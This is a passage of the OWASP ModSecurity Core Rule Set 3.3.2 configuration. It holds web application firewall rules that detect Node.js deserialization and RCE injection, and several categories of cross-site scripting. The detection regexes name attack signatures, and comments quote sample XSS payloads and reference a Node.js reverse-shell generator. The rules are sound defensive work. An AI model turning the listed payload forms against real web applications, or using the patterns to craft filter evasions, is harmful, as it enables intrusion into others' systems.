# Please see the enclosed LICENSE file for full details.
# ------------------------------------------------------------------------
#
# -= Paranoia Level 0 (empty) =- (apply unconditionally)
#
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:934011,phase:1,pass,nolog,skipAfter:END-REQUEST-934-APPLICATION-ATTACK-NODEJS"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:934012,phase:2,pass,nolog,skipAfter:END-REQUEST-934-APPLICATION-ATTACK-NODEJS"
#
# -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher)
#
# [ Insecure unserialization / generic RCE signatures ]
#
# Libraries performing insecure unserialization:
# - node-serialize: _$$ND_FUNC$$_ (CVE-2017-5941)
# - funcster: __js_function
#
# See:
# https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/
# https://www.acunetix.com/blog/web-security-zone/deserialization-vulnerabilities-attacking-deserialization-in-js/
#
# Some generic snippets used:
# - function() {
# - new Function(
# - eval(
# - String.fromCharCode(
#
# Last two are used by nodejsshell.py,
# https://github.com/ajinabraham/Node.Js-Security-Course/blob/master/nodejsshell.py
#
# As base64 is sometimes (but not always) used to encode serialized values,
# use multiMatch and t:base64decode.
#
# Regexp generated from util/regexp-assemble/regexp-934100.data using Regexp::Assemble.
# See https://coreruleset.org/20190826/optimizing-regular-expressions/ for usage.
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:(?:_(?:\$\$ND_FUNC\$\$_|_js_function)|(?:new\s+Function|\beval)\s*\(|String\s*\.\s*fromCharCode|function\s*\(\s*\)\s*{|this\.constructor)|module\.exports\s*=)" \
"id:934100,\
phase:2,\
block,\
capture,\
t:none,t:urlDecodeUni,t:base64Decode,\
msg:'Node.js Injection Attack',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-javascript',\
tag:'platform-multi',\
tag:'attack-rce',\
tag:'attack-injection-nodejs',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
tag:'capec/1000/152/242',\
ctl:auditLogParts=+E,\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
multiMatch,\
setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:934013,phase:1,pass,nolog,skipAfter:END-REQUEST-934-APPLICATION-ATTACK-NODEJS"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:934014,phase:2,pass,nolog,skipAfter:END-REQUEST-934-APPLICATION-ATTACK-NODEJS"
#
# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher)
#
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:934015,phase:1,pass,nolog,skipAfter:END-REQUEST-934-APPLICATION-ATTACK-NODEJS"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:934016,phase:2,pass,nolog,skipAfter:END-REQUEST-934-APPLICATION-ATTACK-NODEJS"
#
# -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher)
#
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:934017,phase:1,pass,nolog,skipAfter:END-REQUEST-934-APPLICATION-ATTACK-NODEJS"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:934018,phase:2,pass,nolog,skipAfter:END-REQUEST-934-APPLICATION-ATTACK-NODEJS"
#
# -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher)
#
#
# -= Paranoia Levels Finished =-
#
SecMarker "END-REQUEST-934-APPLICATION-ATTACK-NODEJS"

884
core/modsecurity/files/coreruleset/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf Normal file
View File

@@ -0,0 +1,884 @@
# ------------------------------------------------------------------------
# OWASP ModSecurity Core Rule Set ver.3.3.2
# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
#
# The OWASP ModSecurity Core Rule Set is distributed under
# Apache Software License (ASL) version 2
# Please see the enclosed LICENSE file for full details.
# ------------------------------------------------------------------------
#
# -= Paranoia Level 0 (empty) =- (apply unconditionally)
#
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:941011,phase:1,pass,nolog,skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:941012,phase:2,pass,nolog,skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS"
#
# -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher)
#
#
# -=[ Libinjection - XSS Detection ]=-
#
# Ref: https://github.com/client9/libinjection
# Ref: https://speakerdeck.com/ngalbreath/libinjection-from-sqli-to-xss
#
# -=[ Targets ]=-
#
# 941100: PL1 : REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|
# REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|
# ARGS_NAMES|ARGS|XML:/*
#
# 941101: PL2 : REQUEST_HEADERS:Referer
#
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|ARGS_NAMES|ARGS|XML:/* "@detectXSS" \
"id:941100,\
phase:2,\
block,\
t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\
msg:'XSS Attack Detected via libinjection',\
logdata:'Matched Data: XSS data found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-multi',\
tag:'attack-xss',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
tag:'capec/1000/152/242',\
ctl:auditLogParts=+E,\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
#
# -=[ XSS Filters - Category 1 ]=-
# http://xssplayground.net23.net/xssfilter.html
# script tag based XSS vectors, e.g., <script> alert(1)</script>
#
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer|ARGS_NAMES|ARGS|XML:/* "@rx (?i)<script[^>]*>[\s\S]*?" \
"id:941110,\
phase:2,\
block,\
capture,\
t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\
msg:'XSS Filter - Category 1: Script Tag Vector',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-multi',\
tag:'attack-xss',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
tag:'capec/1000/152/242',\
ctl:auditLogParts=+E,\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
#
# -=[ XSS Filters - Category 2 ]=-
# XSS vectors making use of event handlers like onerror, onload etc, e.g., <body onload="alert(1)">
#
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer|ARGS_NAMES|ARGS|XML:/* "@rx (?i)[\s\"'`;\/0-9=\x0B\x09\x0C\x3B\x2C\x28\x3B]on[a-zA-Z]+[\s\x0B\x09\x0C\x3B\x2C\x28\x3B]*?=" \
"id:941120,\
phase:2,\
block,\
capture,\
t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\
msg:'XSS Filter - Category 2: Event Handler Vector',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-multi',\
tag:'attack-xss',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
tag:'capec/1000/152/242',\
ctl:auditLogParts=+E,\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
#
# -=[ XSS Filters - Category 3 ]=-
#
# Regexp generated from util/regexp-assemble/regexp-941130.data using Regexp::Assemble.
# To rebuild the regexp:
# cd util/regexp-assemble
# ./regexp-assemble.pl regexp-941130.data
#
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|ARGS_NAMES|ARGS|XML:/* "@rx (?i)[\s\S](?:!ENTITY\s+(?:\S+|%\s+\S+)\s+(?:PUBLIC|SYSTEM)|x(?:link:href|html|mlns)|data:text\/html|pattern\b.*?=|formaction|\@import|;base64)\b" \
"id:941130,\
phase:2,\
block,\
capture,\
t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\
msg:'XSS Filter - Category 3: Attribute Vector',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-multi',\
tag:'attack-xss',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
tag:'capec/1000/152/242',\
ctl:auditLogParts=+E,\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
#
# -=[ XSS Filters - Category 4 ]=-
# XSS vectors making use of javascript uri and tags, e.g., <p style="background:url(javascript:alert(1))">
#
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\b[^>]*?>[\s\S]*?|(?:=|U\s*?R\s*?L\s*?\()\s*?[^>]*?\s*?S\s*?C\s*?R\s*?I\s*?P\s*?T\s*?:)" \
"id:941140,\
phase:2,\
block,\
capture,\
t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\
msg:'XSS Filter - Category 4: Javascript URI Vector',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-multi',\
tag:'attack-xss',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
tag:'capec/1000/152/242',\
ctl:auditLogParts=+E,\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
#
# -=[ NoScript XSS Filters ]=-
# Ref: http://noscript.net/
#
# [NoScript InjectionChecker] HTML injection
#
# Regexp generated from util/regexp-assemble/regexp-941160.data using Regexp::Assemble.
# To rebuild the regexp:
# cd util/regexp-assemble
# ./regexp-assemble.pl regexp-941160.data
# Note that after assemble an ignore case flag (i) is added to the to the Regexp::Assemble output:
# Add ignore case flag between '?' and ':': "(?i:...)"
#
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer|ARGS_NAMES|ARGS|XML:/* "@rx (?i:(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)(?:on(?:d(?:e(?:vice(?:(?:orienta|mo)tion|proximity|found|light)|livery(?:success|error)|activate)|r(?:ag(?:e(?:n(?:ter|d)|xit)|(?:gestur|leav)e|start|drop|over)|op)|i(?:s(?:c(?:hargingtimechange|onnect(?:ing|ed))|abled)|aling)|ata(?:setc(?:omplete|hanged)|(?:availabl|chang)e|error)|urationchange|ownloading|blclick)|Moz(?:M(?:agnifyGesture(?:Update|Start)?|ouse(?:PixelScroll|Hittest))|S(?:wipeGesture(?:Update|Start|End)?|crolledAreaChanged)|(?:(?:Press)?TapGestur|BeforeResiz)e|EdgeUI(?:C(?:omplet|ancel)|Start)ed|RotateGesture(?:Update|Start)?|A(?:udioAvailable|fterPaint))|c(?:o(?:m(?:p(?:osition(?:update|start|end)|lete)|mand(?:update)?)|n(?:t(?:rolselect|extmenu)|nect(?:ing|ed))|py)|a(?:(?:llschang|ch)ed|nplay(?:through)?|rdstatechange)|h(?:(?:arging(?:time)?ch)?ange|ecking)|(?:fstate|ell)change|u(?:echange|t)|l(?:ick|ose))|s(?:t(?:a(?:t(?:uschanged|echange)|lled|rt)|k(?:sessione|comma)nd|op)|e(?:ek(?:complete|ing|ed)|(?:lec(?:tstar)?)?t|n(?:ding|t))|(?:peech|ound)(?:start|end)|u(?:ccess|spend|bmit)|croll|how)|m(?:o(?:z(?:(?:pointerlock|fullscreen)(?:change|error)|(?:orientation|time)change|network(?:down|up)load)|use(?:(?:lea|mo)ve|o(?:ver|ut)|enter|wheel|down|up)|ve(?:start|end)?)|essage|ark)|a(?:n(?:imation(?:iteration|start|end)|tennastatechange)|fter(?:(?:scriptexecu|upda)te|print)|udio(?:process|start|end)|d(?:apteradded|dtrack)|ctivate|lerting|bort)|b(?:e(?:fore(?:(?:(?:de)?activa|scriptexecu)te|u(?:nload|pdate)|p(?:aste|rint)|c(?:opy|ut)|editfocus)|gin(?:Event)?)|oun(?:dary|ce)|l(?:ocked|ur)|roadcast|usy)|DOM(?:Node(?:Inserted(?:IntoDocument)?|Removed(?:FromDocument)?)|(?:CharacterData|Subtree)Modified|A(?:ttrModified|ctivate)|Focus(?:Out|In)|MouseScroll)|r(?:e(?:s(?:u(?:m(?:ing|e)|lt)|ize|et)|adystatechange|pea(?:tEven)?t|movetrack|trieving|ceived)|ow(?:s(?:inserted|delete)|e(?:nter|xit))|atechange)|p(?:op(?:up(?:hid(?:den|ing)|show(?:ing|n))|state)|a(?:ge(?:hide|show)|(?:st|us)e|int)|ro(?:pertychange|gress)|lay(?:ing)?)|t(?:ouch(?:(?:lea|mo)ve|en(?:ter|d)|cancel|start)|ransition(?:cancel|end|run)|ime(?:update|out)|ext)|u(?:s(?:erproximity|sdreceived)|p(?:gradeneeded|dateready)|n(?:derflow|load))|f(?:o(?:rm(?:change|input)|cus(?:out|in)?)|i(?:lterchange|nish)|ailed)|l(?:o(?:ad(?:e(?:d(?:meta)?data|nd)|start)|secapture)|evelchange|y)|g(?:amepad(?:(?:dis)?connected|button(?:down|up)|axismove)|et)|e(?:n(?:d(?:Event|ed)?|abled|ter)|rror(?:update)?|mptied|xit)|i(?:cc(?:cardlockerror|infochange)|n(?:coming|valid|put))|o(?:(?:(?:ff|n)lin|bsolet)e|verflow(?:changed)?|pen)|SVG(?:(?:Unl|L)oad|Resize|Scroll|Abort|Error|Zoom)|h(?:e(?:adphoneschange|l[dp])|ashchange|olding)|v(?:o(?:lum|ic)e|ersion)change|w(?:a(?:it|rn)ing|heel)|key(?:press|down|up)|(?:AppComman|Loa)d|no(?:update|match)|Request|zoom)|s(?:tyle|rc)|background|formaction|lowsrc|ping)[\s\x08]*?=|<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?(?:(?:a\W*?(?:n\W*?i\W*?m\W*?a\W*?t\W*?e|p\W*?p\W*?l\W*?e\W*?t|u\W*?d\W*?i\W*?o)|b\W*?(?:i\W*?n\W*?d\W*?i\W*?n\W*?g\W*?s|a\W*?s\W*?e|o\W*?d\W*?y)|i?\W*?f\W*?r\W*?a\W*?m\W*?e|o\W*?b\W*?j\W*?e\W*?c\W*?t|i\W*?m\W*?a?\W*?g\W*?e?|e\W*?m\W*?b\W*?e\W*?d|p\W*?a\W*?r\W*?a\W*?m|v\W*?i\W*?d\W*?e\W*?o|l\W*?i\W*?n\W*?k)[^>\w]|s\W*?(?:c\W*?r\W*?i\W*?p\W*?t|t\W*?y\W*?l\W*?e|e\W*?t[^>\w]|v\W*?g)|m\W*?(?:a\W*?r\W*?q\W*?u\W*?e\W*?e|e\W*?t\W*?a[^>\w])|f\W*?o\W*?r\W*?m))" \
"id:941160,\
phase:2,\
block,\
capture,\
t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\
msg:'NoScript XSS InjectionChecker: HTML Injection',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-multi',\
tag:'attack-xss',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
tag:'capec/1000/152/242',\
ctl:auditLogParts=+E,\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
#
# [NoScript InjectionChecker] Attributes injection
#
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:\W|^)(?:javascript:(?:[\s\S]+[=\\\(\[\.<]|[\s\S]*?(?:\bname\b|\\[ux]\d))|data:(?:(?:[a-z]\w+\/\w[\w+-]+\w)?[;,]|[\s\S]*?;[\s\S]*?\b(?:base64|charset=)|[\s\S]*?,[\s\S]*?<[\s\S]*?\w[\s\S]*?>))|@\W*?i\W*?m\W*?p\W*?o\W*?r\W*?t\W*?(?:\/\*[\s\S]*?)?(?:[\"']|\W*?u\W*?r\W*?l[\s\S]*?\()|\W*?-\W*?m\W*?o\W*?z\W*?-\W*?b\W*?i\W*?n\W*?d\W*?i\W*?n\W*?g[\s\S]*?:[\s\S]*?\W*?u\W*?r\W*?l[\s\S]*?\(" \
"id:941170,\
phase:2,\
block,\
capture,\
t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\
msg:'NoScript XSS InjectionChecker: Attribute Injection',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-multi',\
tag:'attack-xss',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
tag:'capec/1000/152/242',\
ctl:auditLogParts=+E,\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
#
# [Blacklist Keywords from Node-Validator]
# https://raw.github.com/chriso/node-validator/master/validator.js
#
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@pm document.cookie document.write .parentnode .innerhtml window.location -moz-binding <!-- --> <![cdata[" \
"id:941180,\
phase:2,\
block,\
capture,\
t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:lowercase,t:removeNulls,\
msg:'Node-Validator Blacklist Keywords',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-multi',\
tag:'attack-xss',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
tag:'capec/1000/152/242',\
ctl:auditLogParts=+E,\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
#
# -=[ XSS Filters from IE ]=-
# Ref: http://blogs.technet.com/srd/archive/2008/08/18/ie-8-xss-filter-architecture-implementation.aspx
# Ref: http://xss.cx/examples/ie/internet-exploror-ie9-xss-filter-rules-example-regexp-mshtmldll.txt
#
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:<style.*?>.*?(?:@[i\\\\]|(?:[:=]|&#x?0*(?:58|3A|61|3D);?).*?(?:[(\\\\]|&#x?0*(?:40|28|92|5C);?)))" \
"id:941190,\
phase:2,\
block,\
capture,\
t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\
msg:'IE XSS Filters - Attack Detected',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-multi',\
tag:'attack-xss',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
tag:'capec/1000/152/242',\
ctl:auditLogParts=+E,\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:<.*[:]?vmlframe.*?[\s/+]*?src[\s/+]*=)" \
"id:941200,\
phase:2,\
block,\
capture,\
t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\
msg:'IE XSS Filters - Attack Detected',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-multi',\
tag:'attack-xss',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
tag:'capec/1000/152/242',\
ctl:auditLogParts=+E,\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:(?:j|&#x?0*(?:74|4A|106|6A);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:a|&#x?0*(?:65|41|97|61);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:v|&#x?0*(?:86|56|118|76);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:a|&#x?0*(?:65|41|97|61);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:s|&#x?0*(?:83|53|115|73);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:c|&#x?0*(?:67|43|99|63);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:r|&#x?0*(?:82|52|114|72);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:i|&#x?0*(?:73|49|105|69);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:p|&#x?0*(?:80|50|112|70);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:t|&#x?0*(?:84|54|116|74);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?::|&(?:#x?0*(?:58|3A);?|colon;)).)" \
"id:941210,\
phase:2,\
block,\
capture,\
t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\
msg:'IE XSS Filters - Attack Detected',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-multi',\
tag:'attack-xss',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
tag:'capec/1000/152/242',\
ctl:auditLogParts=+E,\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:(?:v|&#x?0*(?:86|56|118|76);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:b|&#x?0*(?:66|42|98|62);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:s|&#x?0*(?:83|53|115|73);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:c|&#x?0*(?:67|43|99|63);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:r|&#x?0*(?:82|52|114|72);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:i|&#x?0*(?:73|49|105|69);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:p|&#x?0*(?:80|50|112|70);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:t|&#x?0*(?:84|54|116|74);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?::|&(?:#x?0*(?:58|3A);?|colon;)).)" \
"id:941220,\
phase:2,\
block,\
capture,\
t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\
msg:'IE XSS Filters - Attack Detected',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-multi',\
tag:'attack-xss',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
tag:'capec/1000/152/242',\
ctl:auditLogParts=+E,\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)<EMBED[\s/+].*?(?:src|type).*?=" \
"id:941230,\
phase:2,\
block,\
capture,\
t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\
msg:'IE XSS Filters - Attack Detected',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-multi',\
tag:'attack-xss',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
tag:'capec/1000/152/242',\
ctl:auditLogParts=+E,\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx <[?]?import[\s\/+\S]*?implementation[\s\/+]*?=" \
"id:941240,\
phase:2,\
block,\
capture,\
t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:lowercase,t:removeNulls,\
msg:'IE XSS Filters - Attack Detected',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-multi',\
tag:'attack-xss',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
tag:'capec/1000/152/242',\
ctl:auditLogParts=+E,\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:<META[\s/+].*?http-equiv[\s/+]*=[\s/+]*[\"'`]?(?:(?:c|&#x?0*(?:67|43|99|63);?)|(?:r|&#x?0*(?:82|52|114|72);?)|(?:s|&#x?0*(?:83|53|115|73);?)))" \
"id:941250,\
phase:2,\
block,\
capture,\
t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\
msg:'IE XSS Filters - Attack Detected',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-multi',\
tag:'attack-xss',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
tag:'capec/1000/152/242',\
ctl:auditLogParts=+E,\
